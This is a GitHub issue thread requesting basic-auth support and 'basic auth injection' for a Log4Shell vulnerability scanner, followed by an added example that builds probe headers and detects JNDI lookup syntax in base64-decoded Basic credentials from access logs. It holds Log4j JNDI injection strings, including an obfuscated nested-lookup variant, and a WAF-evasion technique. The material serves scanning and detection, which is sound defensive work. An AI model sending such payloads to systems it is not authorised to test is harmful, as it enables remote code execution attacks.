[Feature Request]: Support basic authentication and basic auth injection #81

Open
axel3rd opened this issue Dec 17, 2021 · 3 comments · Fixed by axel3rd/log4j-scan#1 · May be fixed by #95

Comments

@axel3rd
Contributor

axel3rd commented Dec 17, 2021

When basic authentication is used for legacy applications, providing a valid login/password to request the "application home" and not only the "application login" page gives more chances to check if the application is vulnerable.

Providing --basic-auth-user & --basic-auth-password parameters for preemptive basic authentication could be useful.

In addition, for this kind of application, even if any headers are logged with log4j, the user can sometimes be logged after the basic-auth content is base64-decoded (real use case found).

So having a --basic-auth-injection parameter that injects the default payload as the basic-auth user can be useful (not cumulative with --basic-auth-user, logically incompatible):

    import base64

    # Inject the payload as the basic-auth user; the password part is a throwaway value
    if args.basic_inject:
        fuzzing_headers["Authorization"] = 'Basic %s' % base64.b64encode((payload + ':fakepassword').encode('utf-8')).decode()

If considered as relevant, I can provide a PR.
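The following is an added example, not code from log4j-scan or from the issue author. It shows the two header-building modes the request describes (preemptive basic auth versus injecting the probe string as the basic-auth user, which it rejects when combined), and the defender-side counterpart: decoding Basic credentials that have been echoed into an access log and flagging any whose decoded content carries Log4j lookup syntax. Function names, the probe strings, the `.invalid` hostname and the access-log format are all assumptions constructed for this example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed placeholder probes for this example; log4j-scan's real default
# payload is not reproduced here. The second one uses a nested lookup so the
# literal word "jndi" never appears in the raw header, which is why the
# detector below keys on the "${" lookup syntax rather than on that word.
SCAN_PAYLOAD = "${jndi:ldap://scanner.example.invalid/probe}"
OBFUSCATED_PAYLOAD = "${${lower:j}ndi:ldap://scanner.example.invalid/probe}"

LOOKUP_SYNTAX = re.compile(r"\$\{")
# Matches an Authorization header echoed into an access log (constructed log format).
LOGGED_BASIC_AUTH = re.compile(r"Authorization: (Basic [A-Za-z0-9+/=]+)")


def build_auth_header(basic_user: Optional[str] = None,
                      basic_password: Optional[str] = None,
                      inject_payload: Optional[str] = None) -> Dict[str, str]:
    """Build the Authorization header for one scan request.

    Two modes, mirroring the issue: preemptive basic auth with a real
    user/password, or injecting the probe string as the basic-auth user.
    They are mutually exclusive, so asking for both is rejected up front.
    """
    if inject_payload is not None and basic_user is not None:
        raise ValueError("basic-auth-user and basic-auth-injection cannot be combined")
    if inject_payload is not None:
        credentials = f"{inject_payload}:fakepassword"
    elif basic_user is not None:
        credentials = f"{basic_user}:{basic_password or ''}"
    else:
        return {}
    token = base64.b64encode(credentials.encode("utf-8")).decode("ascii")
    return {"Authorization": f"Basic {token}"}


def decode_basic_auth(header_value: str) -> Optional[str]:
    """Decode a 'Basic <base64>' header value to its 'user:password' text.

    Returns None for other schemes or malformed base64 instead of raising,
    so a sweep over a large log never dies on one garbage header.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_lookups_in_basic_auth(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_credentials) for every logged Basic
    credential that contains Log4j lookup syntax.

    The whole decoded string is scanned, not just the part before the first
    colon: the lookup syntax itself contains colons, and how the application
    splits user from password is not known to the person reviewing the log.
    """
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = LOGGED_BASIC_AUTH.search(line)
        if not match:
            continue
        decoded = decode_basic_auth(match.group(1))
        if decoded is not None and LOOKUP_SYNTAX.search(decoded):
            hits.append((number, decoded))
    return hits


def _log_line(path: str, auth: Dict[str, str]) -> str:
    """Constructed access-log line with the Authorization header echoed in."""
    header = f' "Authorization: {auth["Authorization"]}"' if auth else ""
    return f'10.0.0.5 - - [17/Dec/2021:10:00:01 +0000] "GET {path} HTTP/1.1" 200{header}'


# Constructed sample log: one legitimate login, two probes, one anonymous request.
SAMPLE_LOG = [
    _log_line("/app/home", build_auth_header(basic_user="alice", basic_password="s3cret")),
    _log_line("/app/home", build_auth_header(inject_payload=SCAN_PAYLOAD)),
    _log_line("/app/home", build_auth_header(inject_payload=OBFUSCATED_PAYLOAD)),
    _log_line("/app/login", build_auth_header()),
]

if __name__ == "__main__":
    for number, decoded in find_lookups_in_basic_auth(SAMPLE_LOG):
        print(f"line {number}: lookup syntax in basic-auth credentials {decoded!r}")
```

Keying the detector on `${` rather than on the word `jndi` is deliberate: no legitimate basic-auth username starts a lookup expression, and the nested-lookup form in the second probe would slip past a plain substring match on `jndi`. The same decode step is what makes the issue's point concrete: a WAF or log search that only inspects raw header text never sees the probe, because it is hidden inside the base64 token until the application decodes it.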

@mazen160
Contributor

Hi @axel3rd,

This is a totally valid and relevant use-case. I thought about adding it automatically when the Authorization header is in the Headers list.

I saw one tweet that had a similar pattern:

[screenshot from the tweet]

@axel3rd
Contributor Author

axel3rd commented Dec 17, 2021

> I thought about adding it automatically when Authorization header is in Headers list.

There are many Authorization types (Basic, Bearer, ...) as we can see in your screenshot.
In theory we can have multiple Authorization types on the same request (so thread) ... but I have never seen that in "real life".

Perhaps --authorization-injection=basic is a better name/value for this parameter.
In the future some other cumulative value --authorization-injection=basic,bearer,oauth can exist, even if I don't have the concrete implementation now ^^.

But this kind of approach breaks the "adding it automatically when Authorization header is in Headers list", because it doesn't say which type of authorization we need to inject.

@axel3rd
Contributor Author

axel3rd commented Dec 23, 2021

Reopen for merge in original repo.

Testable from https://github.com/axel3rd/log4j-scan
